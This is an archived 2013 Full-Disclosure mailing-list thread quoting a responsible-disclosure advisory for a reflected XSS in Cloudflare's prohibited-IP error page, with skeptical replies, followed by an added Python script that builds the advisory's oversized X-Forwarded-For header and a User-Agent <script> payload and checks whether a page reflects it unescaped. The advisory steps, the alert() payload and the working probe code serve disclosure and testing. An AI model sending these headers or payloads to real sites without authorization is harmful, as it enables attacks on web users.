Heard of flash m8?
2013/8/22 <xn...@xnite.org>
> That's a nice trick and all, but I don't see how it's valuable. In order
> to trigger the XSS you need to modify your browser headers, therefore any
> victim who you are trying to get to a page to execute your XSS would need
> to also modify THEIR browser headers. I don't see how this is anything
> more than a neat trick. Sorry.
>
> On Thursday 22 August 2013 23:18:03 Glenn Grant wrote:
> > Details below of an XSS vulnerability I discovered in Cloudflare (markdown
> > format)
> >
> > - Glenn | /dev/alias
> > * http://blog.devalias.net
> > * http://devalias.net
> >
> > -----
> >
> > **Reference Number:** DAHAX-2013-001 (/dev/alias/hacks 2013-001)
> >
> > **Notification Timeline:**
> >
> > * 10/07/2013, Request# 38713 (https://support.cloudflare.com/anonymous_requests/new)
> > * 10/07/2013, Vendor looking into issue
> > * 16/07/2013, Updated vendor with new details (Length: 101 instead of 72)
> > * 16/07/2013, Vendor requested that I test again
> > * [No further response from vendor]
> > * 01/08/2013, Tested again, vulnerability fixed
> >
> > **Details Published:** 14/08/2013 (http://blog.devalias.net/post/58217238426/dahax-2013-001-cloudflare-xss-vulnerability)
> >
> > ## What?
> >
> > * Reflected XSS (cross site scripting) attack
> >
> > ## Where's Affected?
> >
> > * Theoretically it seems that any page that uses cloudflare will be
> >   affected.
> >   - Eg: http://www.cloudflare.com/
> >
> > ## How?
> >
> > * **To bring up the vulnerable page**
> >   - Set your X-Forwarded-For header to <del>72+</del> 101+ characters
> >   - <del>Eg: X-Forwarded-For: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHH</del>
> >   - Eg: <pre>X-Forwarded-For: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJK</pre>
> >   - Load a site using cloudflare
> >   - You should end up on the "DNS Points to Prohibited IP" page
> >
> > * **To trigger the XSS**
> >   - Set your User-Agent string to the XSS attack
> >   - Eg: <pre>User-Agent: USER-AGENT being tested for XSS..<script>alert('Vulnerable to XSS via USER-AGENT header [Found by devalias.net]')</script></pre>
> >
> > * **The whole attack**
> >   - Ensure your X-Forwarded-For and User-Agent headers are configured as
> >     above
> >   - Navigate to a page using cloudflare
> >   - ???
> >   - Profit!
> >
> > ## Who?
> >
> > * Discovered by [Glenn '/dev/alias' Grant](http://www.devalias.net/) (gl...@devalias.net)
> >
> > ## Responsible Disclosure Notice
> >
> > * Following in the footsteps of Google's vulnerability disclosure
> >   timeline, unless otherwise agreed to beforehand, I reserve the right to
> >   publicly announce the details of any discovered vulnerabilities 7 days post
> >   notification.
> > * **Google's Rationale:** "Seven days is an aggressive timeline and may
> >   be too short for some vendors to update their products, but it should be
> >   enough time to publish advice about possible mitigations, such as
> >   temporarily disabling a service, restricting access, or contacting the
> >   vendor for more information. As a result, after 7 days have elapsed without
> >   a patch or advisory, we will support researchers making details available
> >   so that users can take steps to protect themselves. By holding ourselves to
> >   the same standard, we hope to improve both the state of web security and
> >   the coordination of vulnerability management."
> >   - [Google](http://googleonlinesecurity.blogspot.com.au/2013/05/disclosure-timeline-for-vulnerabilities.html)
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
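The reproduction steps in the quoted advisory, as an added example that is not part of the original thread and not the advisory author's or Cloudflare's code. It builds the two headers the advisory names (an X-Forwarded-For of 101 or more characters in the advisory's AAAAAAAAAABBBBBBBBBB... pattern, and a User-Agent carrying the payload) and classifies the response as vulnerable (payload reflected verbatim), escaped (present only HTML-encoded, which is what a fix would look like) or not reflected. Assumptions: TARGET_URL is a placeholder, PAYLOAD is a shortened variant of the advisory's alert() string, and the two response bodies plus the fetch stub are constructed so that the script runs offline; the advisory says the live page was fixed on 01/08/2013.

```python
import html
import urllib.request
from typing import Callable, Dict, Optional

# Added example, not the advisory's code. Placeholders / constructed values:
TARGET_URL = "http://example.invalid/"  # placeholder, not a real target
PAYLOAD = "<script>alert('XSS via User-Agent')</script>"  # shortened variant of the advisory's payload


def build_xff(length: int = 101) -> str:
    """X-Forwarded-For value in the advisory's pattern: ten A's, ten B's, ...
    For length=101 this is exactly the AAAAAAAAAABBBBBBBBBB...JJJJJJJJJJK
    string quoted in the advisory. Per the advisory's updated finding, fewer
    than 101 characters does not reach the prohibited-IP page, so reject that."""
    if length < 101:
        raise ValueError("advisory reports 101+ characters are needed (72 was the first estimate)")
    return "".join(chr(ord("A") + i // 10) for i in range(length))


def build_headers(payload: str = PAYLOAD, xff_length: int = 101) -> Dict[str, str]:
    """The two headers the advisory says must be set together."""
    return {"X-Forwarded-For": build_xff(xff_length), "User-Agent": payload}


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """'vulnerable' if the payload appears byte-for-byte (a browser would run it),
    'escaped' if it appears only HTML-encoded, otherwise 'not reflected'."""
    if payload in body:
        return "vulnerable"
    if html.escape(payload) in body or html.escape(payload, quote=False) in body:
        return "escaped"
    return "not reflected"


def _http_fetch(url: str, headers: Dict[str, str]) -> str:
    """Real network fetch; only used when no stub is supplied."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe(url: str = TARGET_URL, payload: str = PAYLOAD,
          fetch: Optional[Callable[[str, Dict[str, str]], str]] = None) -> str:
    """Send the advisory's headers to url and classify the reflection.
    Pass a fetch callable to run against canned bodies without a network."""
    fetch = fetch or _http_fetch
    return classify_reflection(fetch(url, build_headers(payload)), payload)


# Constructed stand-ins for the error page before and after a fix. The real
# markup is not on the page; only the reflection behaviour is modelled.
VULNERABLE_PAGE = ("<html><body><h1>DNS Points to Prohibited IP</h1>"
                   "<p>UA: " + PAYLOAD + "</p></body></html>")
FIXED_PAGE = ("<html><body><h1>DNS Points to Prohibited IP</h1>"
              "<p>UA: " + html.escape(PAYLOAD) + "</p></body></html>")


def demo() -> Dict[str, str]:
    """Probe both canned pages; returns their classifications."""
    return {
        "before_fix": probe(fetch=lambda u, h: VULNERABLE_PAGE),
        "after_fix": probe(fetch=lambda u, h: FIXED_PAGE),
    }


if __name__ == "__main__":
    print(build_headers())
    print(demo())  # {'before_fix': 'vulnerable', 'after_fix': 'escaped'}
```

The probe only shows whether the User-Agent is reflected unescaped on the prohibited-IP page; it says nothing about how those two headers would be delivered in a victim's request, which is the point xnite's reply raises.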